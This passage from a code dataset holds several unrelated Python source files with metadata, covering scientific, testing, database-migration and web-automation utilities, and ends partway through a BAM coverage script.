[0, 1, 1, 7, 0, 0, 0, 3]\n ]\n )\n\n data_csr_matrix = data_converter.DataConverter().convert_multi_docs2document_frequency_matrix(\n labeled_documents=input_dict,\n n_jobs=-1\n )\n assert isinstance(data_csr_matrix, DataCsrMatrix)\n self.label2id_dict = data_csr_matrix.label2id_dict\n self.csr_matrix_ = data_csr_matrix.csr_matrix_\n self.n_docs_distribution = data_csr_matrix.n_docs_distribution\n self.vocabulary = data_csr_matrix.vocabulary\n\n numpy.array_equal(data_csr_matrix.csr_matrix_.toarray(), tf_matrix)\n\n def test_normal_fit_transform(self):\n tf_idf_weighted_matrix = tf_idf.TFIDF().fit_transform(\n X=self.csr_matrix_,\n )\n assert isinstance(tf_idf_weighted_matrix, csr_matrix)\n\n def test_output_result_pmi(self):\n tf_idf_weighted_matrix = tf_idf.TFIDF().fit_transform(\n X=self.csr_matrix_,\n )\n assert isinstance(tf_idf_weighted_matrix, csr_matrix)\n\n tf_idf_scored_dict = ScoredResultObject(\n scored_matrix=tf_idf_weighted_matrix,\n label2id_dict=self.label2id_dict,\n feature2id_dict=self.vocabulary,\n ).convert_score_matrix2score_record(outformat='items')\n self.assertTrue(isinstance(tf_idf_scored_dict, list))\n assert isinstance(tf_idf_scored_dict, list)\n\n\nif __name__ == '__main__':\n unittest.main()\n\n", "repo_name": "Kensuke-Mitsuzawa/DocumentFeatureSelection", "sub_path": "tests/test_tf_idf.py", "file_name": "test_tf_idf.py", "file_ext": "py", "file_size_in_byte": 2853, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 45, "dataset": "github-code", "pt": "52", "api": [{"api_name": "logging.basicConfig", "line_number": 14, "usage_type": "call"}, {"api_name": "logging.DEBUG", "line_number": 14, "usage_type": "attribute"}, {"api_name": "logging.getLogger", "line_number": 15, "usage_type": "call"}, {"api_name": "unittest.TestCase", "line_number": 19, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 41, "usage_type": "call"}, {"api_name": "DocumentFeatureSelection.common.data_converter.DataConverter", "line_number": 49, "usage_type": "call"}, {"api_name": "DocumentFeatureSelection.common.data_converter", "line_number": 49, "usage_type": "name"}, {"api_name": "DocumentFeatureSelection.common.data_converter.DataCsrMatrix", "line_number": 53, "usage_type": "argument"}, {"api_name": "numpy.array_equal", "line_number": 
59, "usage_type": "call"}, {"api_name": "DocumentFeatureSelection.tf_idf.tf_idf.TFIDF", "line_number": 62, "usage_type": "call"}, {"api_name": "DocumentFeatureSelection.tf_idf.tf_idf", "line_number": 62, "usage_type": "name"}, {"api_name": "scipy.sparse.csr_matrix", "line_number": 65, "usage_type": "argument"}, {"api_name": "DocumentFeatureSelection.tf_idf.tf_idf.TFIDF", "line_number": 68, "usage_type": "call"}, {"api_name": "DocumentFeatureSelection.tf_idf.tf_idf", "line_number": 68, "usage_type": "name"}, {"api_name": "scipy.sparse.csr_matrix", "line_number": 71, "usage_type": "argument"}, {"api_name": "DocumentFeatureSelection.models.ScoredResultObject", "line_number": 73, "usage_type": "call"}, {"api_name": "unittest.main", "line_number": 83, "usage_type": "call"}]} +{"seq_id": "15331155865", "text": "\"\"\"Removing Resource Type from Role object.\nWARNING: upgrading and downgrading is destructive, this will not backfill values.\n\nRevision ID: 83644d6eb47f\nRevises: 1fdcf826e468\nCreate Date: 2020-02-14 06:46:25.725488\n\n\"\"\"\nfrom alembic import op\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.orm import Session\nimport sqlalchemy as sa\n\nfrom log import LOG\nfrom web.server.migrations.seed_scripts.seed_83644d6eb47f_remove_resource_type import (\n upvert_data,\n)\n\n# revision identifiers, used by Alembic.\nrevision = '83644d6eb47f'\ndown_revision = '1fdcf826e468'\nbranch_labels = None\ndepends_on = None\n\n\nBase = declarative_base()\n\n\nclass OldRole(Base): # type: ignore\n __tablename__ = 'role'\n\n id = sa.Column(sa.Integer(), primary_key=True)\n name = sa.Column(sa.String(50), nullable=False, server_default='', unique=True)\n label = sa.Column(sa.Unicode(255), server_default='') # for display purposes\n resource_type_id = sa.Column(sa.Integer(), nullable=True)\n\n\n# For downgrade, but assumes that all \"default\" (old) roles still exist\nROLE_ID_NAME_LIST = [\n {'role_name': 'admin', 'resource_type_id': 1},\n {'role_name': 'dashboard_viewer', 'resource_type_id': 2},\n {'role_name': 'dashboard_editor', 'resource_type_id': 2},\n {'role_name': 'dashboard_admin', 'resource_type_id': 2},\n {'role_name': 'directory_reader', 'resource_type_id': 1},\n {'role_name': 'query_runner', 'resource_type_id': 1},\n {'role_name': 'user_admin', 'resource_type_id': 3},\n {'role_name': 'user_moderator', 'resource_type_id': 3},\n {'role_name': 'group_admin', 'resource_type_id': 4},\n {'role_name': 'group_moderator', 'resource_type_id': 4},\n {'role_name': 'query_policy_admin', 'resource_type_id': 5},\n {'role_name': 'query_policy_holder', 'resource_type_id': 5},\n {'role_name': 'query_analyst', 'resource_type_id': 1},\n {'role_name': 'alert_admin', 'resource_type_id': 6},\n {'role_name': 'alert_creator', 'resource_type_id': 6},\n {'role_name': 'alert_editor', 'resource_type_id': 6},\n {'role_name': 'alert_viewer', 'resource_type_id': 6},\n]\n\n\ndef upgrade():\n # NOTE: Not exactly related to this diff but it's easiest to do clean\n # up before resource types disappear.\n upvert_data(op)\n\n # ### commands auto generated by Alembic - please adjust! 
###\n with op.batch_alter_table('role', schema=None) as batch_op:\n batch_op.drop_constraint('valid_resource_type', type_='foreignkey')\n batch_op.drop_column('resource_type_id')\n\n # ### end Alembic commands ###\n\n\ndef restore_resource_types(alembic_operation):\n bind = alembic_operation.get_bind()\n session = Session(bind=bind)\n\n LOG.info('Restoring resource_types to roles')\n\n for item in ROLE_ID_NAME_LIST:\n role_name = item['role_name']\n resource_type_id = item['resource_type_id']\n entity = session.query(OldRole).filter_by(name=role_name).first()\n if entity:\n entity.resource_type_id = resource_type_id\n\n session.commit()\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n with op.batch_alter_table('role', schema=None) as batch_op:\n batch_op.add_column(\n sa.Column(\n 'resource_type_id',\n sa.INTEGER(),\n autoincrement=False,\n nullable=False,\n server_default='1',\n )\n )\n batch_op.create_foreign_key(\n 'valid_resource_type',\n 'resource_type',\n ['resource_type_id'],\n ['id'],\n ondelete='RESTRICT',\n )\n\n restore_resource_types(op)\n\n # ### end Alembic commands ###\n", "repo_name": "Zenysis/Harmony", "sub_path": "web/server/migrations/versions/83644d6eb47f_remove_resource_type.py", "file_name": "83644d6eb47f_remove_resource_type.py", "file_ext": "py", "file_size_in_byte": 3682, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 25, "dataset": "github-code", "pt": "52", "api": [{"api_name": "sqlalchemy.ext.declarative.declarative_base", "line_number": 26, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 32, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 32, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 33, "usage_type": "call"}, {"api_name": "sqlalchemy.String", "line_number": 33, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 34, "usage_type": "call"}, {"api_name": "sqlalchemy.Unicode", "line_number": 34, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 35, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 35, "usage_type": "call"}, {"api_name": "web.server.migrations.seed_scripts.seed_83644d6eb47f_remove_resource_type.upvert_data", "line_number": 63, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 63, "usage_type": "argument"}, {"api_name": "alembic.op.batch_alter_table", "line_number": 66, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 66, "usage_type": "name"}, {"api_name": "sqlalchemy.orm.Session", "line_number": 75, "usage_type": "call"}, {"api_name": "log.LOG.info", "line_number": 77, "usage_type": "call"}, {"api_name": "log.LOG", "line_number": 77, "usage_type": "name"}, {"api_name": "alembic.op.batch_alter_table", "line_number": 91, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 91, "usage_type": "name"}, {"api_name": "sqlalchemy.Column", "line_number": 93, "usage_type": "call"}, {"api_name": "sqlalchemy.INTEGER", "line_number": 95, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 109, "usage_type": "argument"}]} +{"seq_id": "9071431708", "text": "import os\nfrom selenium import webdriver\n\n\nclass WebDriverFactory():\n\n def __init__(self, browser):\n self.browser = browser\n\n def get_web_driver_instance(self, url):\n base_url = url\n if self.browser == \"firefox\":\n driver = webdriver.Firefox()\n elif self.browser == \"chrome\":\n chrome_driver_location = \"/usr/local/bin/chromedriver\"\n 
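            # Illustrative aside (an assumption, not part of the stored file):
            # hard-coding /usr/local/bin/chromedriver is brittle across machines;
            # one portable alternative is to resolve the binary from PATH first,
            # falling back to the fixed location only if the lookup fails.
            import shutil
            chrome_driver_location = shutil.which("chromedriver") or chrome_driver_location
            # Newer Selenium releases (4.6+) can also locate drivers themselves
            # via Selenium Manager, making the explicit path unnecessary.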
os.environ[\"webdriver.chrome.driver\"] = chrome_driver_location\n driver = webdriver.Chrome(chrome_driver_location)\n else:\n driver = webdriver.Firefox()\n driver.implicitly_wait(3)\n driver.get(base_url)\n return driver\n\n", "repo_name": "testingpyt/FPLium-Framework", "sub_path": "base/webdriver_factory.py", "file_name": "webdriver_factory.py", "file_ext": "py", "file_size_in_byte": 665, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "selenium.webdriver.Firefox", "line_number": 13, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 13, "usage_type": "name"}, {"api_name": "os.environ", "line_number": 16, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.Chrome", "line_number": 17, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 17, "usage_type": "name"}, {"api_name": "selenium.webdriver.Firefox", "line_number": 19, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 19, "usage_type": "name"}]} +{"seq_id": "16745079040", "text": "import astropy.io.fits as pyfits\nfrom galsim import Image, GalSimIncompatibleValuesError, GalSimValueError\nfrom galsim.fits import _parse_compression, _add_hdu, _write_file\n\n# The below function is copied from galsim.fits, but I've added a header argument\n# to allow saving with a header\n\n\ndef writeMulti(image_list, file_name=None, dir=None, hdu_list=None, clobber=True,\n compression='auto', header_list=None):\n \"\"\"Write a Python list of images to a multi-extension FITS file.\n The details of how the images are written to file depends on the arguments.\n @param image_list A Python list of Images. (For convenience, some items in this list\n may be HDUs already. Any Images will be converted into pyfits HDUs.)\n @param file_name The name of the file to write to. [Either `file_name` or `hdu_list` is\n required.]\n @param dir Optionally a directory name can be provided if `file_name` does not\n already include it. [default: None]\n @param hdu_list A pyfits HDUList. If this is provided instead of `file_name`, then the\n image is appended to the end of the HDUList as a new HDU. In that case,\n the user is responsible for calling either `hdu_list.writeto(...)` or\n `galsim.fits.writeFile(...)` afterwards. [Either `file_name` or `hdu_list`\n is required.]\n @param clobber See documentation for this parameter on the galsim.fits.write() method.\n @param compression See documentation for this parameter on the galsim.fits.write() method.\n @param header_list List of fits headers (one for each image)\n \"\"\"\n\n if any(image.iscomplex for image in image_list if isinstance(image, Image)):\n raise GalSimValueError(\"Cannot write complex Images to a fits file. 
\"\n \"Write image.real and image.imag separately.\", image_list)\n\n file_compress, pyfits_compress = _parse_compression(compression, file_name)\n\n if file_name and hdu_list is not None:\n raise GalSimIncompatibleValuesError(\n \"Cannot provide both file_name and hdu_list\", file_name=file_name, hdu_list=hdu_list)\n if not (file_name or hdu_list is not None):\n raise GalSimIncompatibleValuesError(\n \"Must provide either file_name or hdu_list\", file_name=file_name, hdu_list=hdu_list)\n\n if hdu_list is None:\n hdu_list = pyfits.HDUList()\n\n for i, image in enumerate(image_list):\n if isinstance(image, Image):\n hdu = _add_hdu(hdu_list, image.array, pyfits_compress)\n if image.wcs:\n image.wcs.writeToFitsHeader(hdu.header, image.bounds)\n if header_list is not None:\n hdu.header.extend(header_list[i])\n else:\n # Assume that image is really an HDU. If not, this should give a reasonable error\n # message. (The base type of HDUs vary among versions of pyfits, so it's hard to\n # check explicitly with an isinstance call. For newer pyfits versions, it is\n # pyfits.hdu.base.ExtensionHDU, but not in older versions.)\n hdu_list.append(image)\n\n if file_name:\n _write_file(file_name, dir, hdu_list, clobber, file_compress, pyfits_compress)\n", "repo_name": "des-science/eastlake", "sub_path": "eastlake/fits.py", "file_name": "fits.py", "file_ext": "py", "file_size_in_byte": 3344, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "52", "api": [{"api_name": "galsim.Image", "line_number": 29, "usage_type": "argument"}, {"api_name": "galsim.GalSimValueError", "line_number": 30, "usage_type": "call"}, {"api_name": "galsim.fits._parse_compression", "line_number": 33, "usage_type": "call"}, {"api_name": "galsim.GalSimIncompatibleValuesError", "line_number": 36, "usage_type": "call"}, {"api_name": "galsim.GalSimIncompatibleValuesError", "line_number": 39, "usage_type": "call"}, {"api_name": "astropy.io.fits.HDUList", "line_number": 43, "usage_type": "call"}, {"api_name": "astropy.io.fits", "line_number": 43, "usage_type": "name"}, {"api_name": "galsim.Image", "line_number": 46, "usage_type": "argument"}, {"api_name": "galsim.fits._add_hdu", "line_number": 47, "usage_type": "call"}, {"api_name": "galsim.fits._write_file", "line_number": 60, "usage_type": "call"}]} +{"seq_id": "40771341453", "text": "import cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\no = cv2.imread('sample1.jpg')\nim_grey = cv2.cvtColor(o, cv2.COLOR_BGR2GRAY) # 灰階影像\nt, binary_img = cv2.threshold(im_grey, 140, 255, cv2.THRESH_BINARY_INV)\ncontours, hierarchy = cv2.findContours(binary_img, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\ncv2.drawContours(o, contours, -1, (0, 0, 255), 5)\nplt.subplot(1,2,1), plt.imshow(im_grey, cmap='gray')\nplt.title('original gray image')\nplt.subplot(1,2,2), plt.imshow(o, cmap='gray')\nplt.title('find contour result')\nplt.show()", "repo_name": "RealJackYeh/drmaster_iot_master", "sub_path": "2-13/sample1_contours1.py", "file_name": "sample1_contours1.py", "file_ext": "py", "file_size_in_byte": 546, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "cv2.imread", "line_number": 4, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 5, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 5, "usage_type": "attribute"}, {"api_name": "cv2.threshold", "line_number": 6, "usage_type": "call"}, {"api_name": "cv2.THRESH_BINARY_INV", 
"line_number": 6, "usage_type": "attribute"}, {"api_name": "cv2.findContours", "line_number": 7, "usage_type": "call"}, {"api_name": "cv2.RETR_EXTERNAL", "line_number": 7, "usage_type": "attribute"}, {"api_name": "cv2.CHAIN_APPROX_SIMPLE", "line_number": 7, "usage_type": "attribute"}, {"api_name": "cv2.drawContours", "line_number": 8, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 9, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 9, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 9, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 10, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 10, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 11, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 11, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 11, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 12, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 12, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 13, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 13, "usage_type": "name"}]} +{"seq_id": "34405480487", "text": "from sklearn.cluster import MiniBatchKMeans\nfrom sklearn.cluster import KMeans\nimport numpy as np\nfrom scipy.sparse import issparse\n\ndef cast_to_float32(X):\n if issparse(X):\n X.data = np.float32(X.data)\n else:\n X = np.float32(X)\n return X\n\ndef get_kmeans(cluster_parm):\n if cluster_parm[\"method\"] == \"mini-batch\":\n kmeans = MiniBatchKMeans(n_clusters=cluster_parm[\"n_clusters\"],\n max_iter=cluster_parm[\"max_iter\"],\n batch_size=cluster_parm[\"batch_size\"])\n else:\n kmeans = KMeans(n_clusters=cluster_parm[\"n_clusters\"],\n max_iter=cluster_parm[\"max_iter\"])\n return kmeans\n\ndef convert(input):\n if isinstance(input, dict):\n return {convert(key): convert(value) for key, value in input.iteritems()}\n elif isinstance(input, list):\n return [convert(element) for element in input]\n elif isinstance(input, unicode):\n return input.encode('utf-8')\n else:\n return input\n", "repo_name": "queqichao/FredholmLearning", "sub_path": "util.py", "file_name": "util.py", "file_ext": "py", "file_size_in_byte": 967, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 5, "dataset": "github-code", "pt": "52", "api": [{"api_name": "scipy.sparse.issparse", "line_number": 7, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 8, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 10, "usage_type": "call"}, {"api_name": "sklearn.cluster.MiniBatchKMeans", "line_number": 15, "usage_type": "call"}, {"api_name": "sklearn.cluster.KMeans", "line_number": 19, "usage_type": "call"}]} +{"seq_id": "12040567632", "text": "\"\"\"\n登录测试用例\n\"\"\"\nimport json\nimport unittest\nimport time\n\nfrom config import BASE_DIR\nfrom page.index_page import IndexProxy\nfrom page.login_page import LoginProxy\nfrom utils import DriverUtil\nfrom parameterized import parameterized\n\n\ndef build_login_data():\n \"\"\"登录数据构造方法\"\"\"\n # with open('../data/login_data.json', encoding='utf-8') as f:\n with open(BASE_DIR + '/data/login_data.json', encoding='utf-8') as f:\n data = json.load(f)\n data_list = list()\n for i in data:\n data_list.append((i.get('username'),\n i.get('password'),\n i.get('code'),\n i.get('expect')))\n 
print(data_list)\n return data_list\n\n\nclass TPShopLogin(unittest.TestCase):\n \"\"\"登录测试用例\"\"\"\n\n @classmethod\n def setUpClass(cls):\n cls.driver = DriverUtil.get_driver() # 获取浏览器对象\n cls.index_proxy = IndexProxy() # 首页页面业务执行对象\n cls.login_proxy = LoginProxy() # 登录页面业务执行对象\n\n @classmethod\n def tearDownClass(cls):\n time.sleep(2)\n DriverUtil.quit_driver() # 退出浏览器对象\n\n def setUp(self):\n self.driver.get('http://127.0.0.1') # 打开首页\n self.index_proxy.go_to_login() # 跳转登录页面\n\n @parameterized.expand(build_login_data())\n def test_login(self, username, pwd, code, expect):\n \"\"\"登录测试方法\"\"\"\n self.login_proxy.login_func(username, pwd, code) # 执行登录\n time.sleep(10)\n title = self.driver.title # 获取页面标题\n print(\"title:\", title)\n self.assertIn(expect, title) # 断言判断结果\n\n\nif __name__ == '__main__':\n unittest.main()\n", "repo_name": "limy-liu/test_limy", "sub_path": "script/hm_01_tpshop_login.py", "file_name": "hm_01_tpshop_login.py", "file_ext": "py", "file_size_in_byte": 1789, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "config.BASE_DIR", "line_number": 18, "usage_type": "name"}, {"api_name": "json.load", "line_number": 19, "usage_type": "call"}, {"api_name": "unittest.TestCase", "line_number": 30, "usage_type": "attribute"}, {"api_name": "utils.DriverUtil.get_driver", "line_number": 35, "usage_type": "call"}, {"api_name": "utils.DriverUtil", "line_number": 35, "usage_type": "name"}, {"api_name": "page.index_page.IndexProxy", "line_number": 36, "usage_type": "call"}, {"api_name": "page.login_page.LoginProxy", "line_number": 37, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 41, "usage_type": "call"}, {"api_name": "utils.DriverUtil.quit_driver", "line_number": 42, "usage_type": "call"}, {"api_name": "utils.DriverUtil", "line_number": 42, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 52, "usage_type": "call"}, {"api_name": "parameterized.parameterized.expand", "line_number": 48, "usage_type": "call"}, {"api_name": "parameterized.parameterized", "line_number": 48, "usage_type": "name"}, {"api_name": "unittest.main", "line_number": 59, "usage_type": "call"}]} +{"seq_id": "32893558011", "text": "from typing import Dict, List, Tuple\n\nimport mimesis\nimport mimesis.random\n\nWeightedPool = Tuple[List[str], List[int]]\n\n\nclass PropertiesProvider(mimesis.BaseProvider):\n # Somewhat realistically segmented and weighted pools for random properties: device type/OS/browser\n DEVICE_TYPE_WEIGHTED_POOL: WeightedPool = ([\"Desktop\", \"Mobile\", \"Tablet\"], [8, 1, 1])\n OS_WEIGHTED_POOLS: Dict[str, WeightedPool] = {\n \"Desktop\": ([\"Windows\", \"Mac OS X\", \"Linux\", \"Chrome OS\"], [18, 16, 7, 1]),\n \"Mobile\": ([\"iOS\", \"Android\"], [1, 1]),\n \"Tablet\": ([\"iOS\", \"Android\"], [1, 1]),\n }\n BROWSER_WEIGHTED_POOLS: Dict[str, WeightedPool] = {\n \"Windows\": ([\"Chrome\", \"Firefox\", \"Opera\", \"Microsoft Edge\", \"Internet Explorer\"], [12, 4, 2, 1, 1]),\n \"Mac OS X\": ([\"Chrome\", \"Firefox\", \"Opera\", \"Safari\"], [4, 2, 1, 2]),\n \"Linux\": ([\"Chrome\", \"Firefox\", \"Opera\"], [3, 3, 1]),\n \"Chrome OS\": ([\"Chrome\"], [1]),\n \"iOS\": ([\"Mobile Safari\", \"Chrome iOS\", \"Firefox iOS\"], [8, 1, 1]),\n \"Android\": ([\"Chrome\", \"Android Mobile\", \"Samsung Internet\", \"Firefox\"], [5, 3, 3, 1]),\n }\n\n random: mimesis.random.Random\n\n def device_type_os_browser(self) -> Tuple[str, str, str]:\n device_type_pool, device_type_weights = 
self.DEVICE_TYPE_WEIGHTED_POOL\n device_type = self.random.choices(device_type_pool, device_type_weights)[0]\n os_pool, os_weights = self.OS_WEIGHTED_POOLS[device_type]\n os = self.random.choices(os_pool, os_weights)[0]\n browser_pool, browser_weights = self.BROWSER_WEIGHTED_POOLS[os]\n browser = self.random.choices(browser_pool, browser_weights)[0]\n return device_type, os, browser\n", "repo_name": "lokeshpahal/posthog1", "sub_path": "posthog/demo/matrix/randomization.py", "file_name": "randomization.py", "file_ext": "py", "file_size_in_byte": 1693, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "typing.Tuple", "line_number": 6, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 6, "usage_type": "name"}, {"api_name": "mimesis.BaseProvider", "line_number": 9, "usage_type": "attribute"}, {"api_name": "typing.Dict", "line_number": 12, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 17, "usage_type": "name"}, {"api_name": "mimesis.random", "line_number": 26, "usage_type": "attribute"}, {"api_name": "typing.Tuple", "line_number": 28, "usage_type": "name"}]} +{"seq_id": "28989579838", "text": "#https://www.zhihu.com/question/269707221/answer/2677167861\ndef commit(content):\n import git\n repo = git.Repo(search_parent_directories=True)\n try:\n g = repo.git\n g.add(\"--all\")\n res = g.commit(\"-m \" + content)\n print(res)\n except Exception as e:\n print(\"no need to commit\")", "repo_name": "K-Nick/MS-DETR", "sub_path": "kn_util/basic/git_utils.py", "file_name": "git_utils.py", "file_ext": "py", "file_size_in_byte": 321, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 13, "dataset": "github-code", "pt": "52", "api": [{"api_name": "git.Repo", "line_number": 4, "usage_type": "call"}]} +{"seq_id": "16506360462", "text": "# Standard Python libraries\nfrom pathlib import Path\n\n# https://github.com/usnistgov/DataModelDict\nfrom DataModelDict import DataModelDict as DM\n\n# http://www.numpy.org/\nimport numpy as np\n\n# https://github.com/usnistgov/atomman\nimport atomman as am\n\n# iprPy imports\nfrom .. 
import libdir\n\ndef assign_composition(df, database, lib_directory=None):\n \"\"\"\n Assigns compositions to calculations.\n \"\"\"\n # Build counts for available prototypes\n prototypes = database.get_records(style='crystal_prototype')\n counts = {}\n for prototype in prototypes:\n counts[prototype.name] = np.unique(prototype.content.finds('component'), return_counts=True)[1]\n \n # Set default lib_directory (for ref structures)\n if lib_directory is None:\n lib_directory = libdir\n \n # Identify compositions\n compositions = []\n for i, series in df.iterrows():\n \n # Use ucell system if available (crystal_space_group)\n if 'ucell' in series:\n composition = series.ucell.composition\n if composition is not None:\n compositions.append(composition)\n else:\n compositions.append(np.nan)\n \n # Use symbols and family info if available (E_vs_r_scan, relax_*) \n elif 'symbols' in series and 'family' in series:\n \n # If family is a prototype\n if series.family in counts:\n compositions.append(am.tools.compositionstr(series.symbols, counts[series.family]))\n \n # If family is a ref\n else:\n elements = '-'.join(np.unique(series.symbols))\n fname = Path(lib_directory, 'reference_crystal', series.family + '.json')\n try:\n ucell = am.load('system_model', fname)\n except:\n compositions.append(np.nan)\n else:\n count = np.unique(ucell.atoms.atype, return_counts=True)[1]\n compositions.append(am.tools.compositionstr(ucell.symbols, count))\n else:\n compositions.append(np.nan)\n df['composition'] = compositions", "repo_name": "lmhale99/iprPy_diatom_scan", "sub_path": "iprPy/analysis/assign_composition.py", "file_name": "assign_composition.py", "file_ext": "py", "file_size_in_byte": 2163, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "numpy.unique", "line_number": 24, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 40, "usage_type": "attribute"}, {"api_name": "atomman.tools.compositionstr", "line_number": 47, "usage_type": "call"}, {"api_name": "atomman.tools", "line_number": 47, "usage_type": "attribute"}, {"api_name": "numpy.unique", "line_number": 51, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 52, "usage_type": "call"}, {"api_name": "atomman.load", "line_number": 54, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 56, "usage_type": "attribute"}, {"api_name": "numpy.unique", "line_number": 58, "usage_type": "call"}, {"api_name": "atomman.tools.compositionstr", "line_number": 59, "usage_type": "call"}, {"api_name": "atomman.tools", "line_number": 59, "usage_type": "attribute"}, {"api_name": "numpy.nan", "line_number": 61, "usage_type": "attribute"}]} +{"seq_id": "8478257298", "text": "#!/usr/bin/env python\n\nimport sys\nimport csv\n\nimport numpy as np\nimport h5py\nimport pysam\n\nimport logging\nlogging.basicConfig(\n level=logging.INFO, format='%(asctime)s|%(levelname)s|%(message)s')\n\n\n\"\"\"SAM is 1-based while BAM is 0-based, pysam always follow python convention,\nso do my codes\"\"\"\n\n\ndef extract_barcode(query_name, lib_id=None):\n bc = query_name.split('_')[-1]\n if lib_id is not None:\n bc += '-{0}'.format(lib_id)\n return bc\n\n\ndef update_span(old, new):\n \"\"\"be functional, yey!\"\"\"\n return (\n min(old[0], new[0]),\n max(old[1], new[1]),\n old[2] + new[2] # update read_count\n )\n\n\n# def gen_span_tuple(rec):\n# return (\n# rec.reference_start,\n# rec.reference_end,\n# 1\n# )\n\n\ndef parse_bam_record(rec):\n rn = 
rec.reference_name\n    beg = int(rec.reference_start)\n    end = int(rec.reference_end)\n    return rn, beg, end\n\n\ndef pass_qc(sam_record):\n    \"\"\"pass quality check or not\"\"\"\n    rec = sam_record\n    return not (\n        rec.reference_id == -1\n        or rec.reference_end is None  # read is unmapped or no cigar alignment\n        # or rec.mapping_quality == 0\n    )\n\n\n# def get_lib_id(input_bam, dd):\n#     for k in dd.keys():\n#         if k in input_bam:\n#             return dd[k]\n\n\n# def update_read_cov_arr(arr, rec):\n#     arr[rec.reference_start: rec.reference_end] += 1\n\n\ndef gen_barcode_and_read_cov(input_bam, lib_id, contig_len_dd, out_h5):\n    \"\"\"lib_id: library id, used to disambiguate barcodes from different\n    libraries\"\"\"\n    rc_arr = None  # read coverage\n    bc_arr = None  # barcode coverage\n    curr_rn = None  # current ref name\n    bc_span_dd = None\n    num_parsed_contigs = 0\n\n    logging.info('reading {0}'.format(input_bam))\n    infile = pysam.AlignmentFile(input_bam)\n\n    h5_writer = h5py.File(out_h5, \"w\")\n\n    for k, rec in enumerate(infile):\n        if not pass_qc(rec):\n            continue\n        rn, beg, end = parse_bam_record(rec)\n\n        # process barcode span\n        bc = extract_barcode(rec.query_name, lib_id)\n        span = (beg, end, 1)  # 1 is read count\n\n        if curr_rn is None:\n            curr_rn = rn\n            contig_len = contig_len_dd[curr_rn]\n            rc_arr = np.zeros((contig_len,), dtype=np.uint)\n            bc_arr = np.zeros((contig_len,), dtype=np.uint)\n            bc_span_dd = {bc: span}\n        else:\n            if curr_rn != rn:\n                # write rc_arr to h5\n                h5_writer.create_dataset(\"{0}/rc\".format(curr_rn), data=rc_arr)\n\n                # fill up bc_arr from info in bc_span_dd\n                for (bc, (span_beg, span_end, _)) in bc_span_dd.items():\n                    bc_arr[span_beg:span_end] += 1\n                h5_writer.create_dataset(\"{0}/bc\".format(curr_rn), data=bc_arr)\n\n                num_parsed_contigs += 1\n\n                # init variables\n                curr_rn = rn\n                contig_len = contig_len_dd[curr_rn]\n                rc_arr = np.zeros((contig_len,), dtype=np.uint)\n                bc_arr = np.zeros((contig_len,), dtype=np.uint)\n                bc_span_dd = {bc: span}\n\n        # update read cov\n        rc_arr[beg:end] += 1\n\n        # update span_dd\n        if bc in bc_span_dd:\n            bc_span_dd[bc] = update_span(bc_span_dd[bc], span)\n        else:\n            bc_span_dd[bc] = span\n\n        if (k + 1) % 1000000 == 0:\n            logging.info(\n                'processed {0} records from {1}'.format(k + 1, input_bam))\n\n    # write rc_arr to h5\n    h5_writer.create_dataset(\"{0}/rc\".format(curr_rn), data=rc_arr)\n\n    # fill up bc_arr from info in bc_span_dd\n    for (bc, (span_beg, span_end, _)) in 